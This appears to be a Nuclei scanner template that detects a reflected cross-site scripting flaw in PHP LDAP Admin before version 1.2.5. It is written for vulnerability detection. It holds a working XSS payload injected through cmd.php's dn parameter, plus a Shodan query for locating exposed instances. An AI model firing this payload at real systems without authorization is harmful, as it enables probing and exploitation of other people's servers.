id: phpldapadmin-xss

info:
  name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
  author: GodfatherOrwa,herry
  severity: medium
  description: PHP LDAP Admin is vulnerable to XSS.
  reference:
    - https://twitter.com/GodfatherOrwa/status/1701392754251563477
  metadata:
    verified: true
    max-request: 9
    shodan-query: html:"phpLDAPadmin"
  tags: php,phpldapadmin,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
      - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"

    attack: pitchfork
    payloads:
      path:
        - /
        - /htdocs/index.php
        - /phpldapadmin

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "No such entry"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950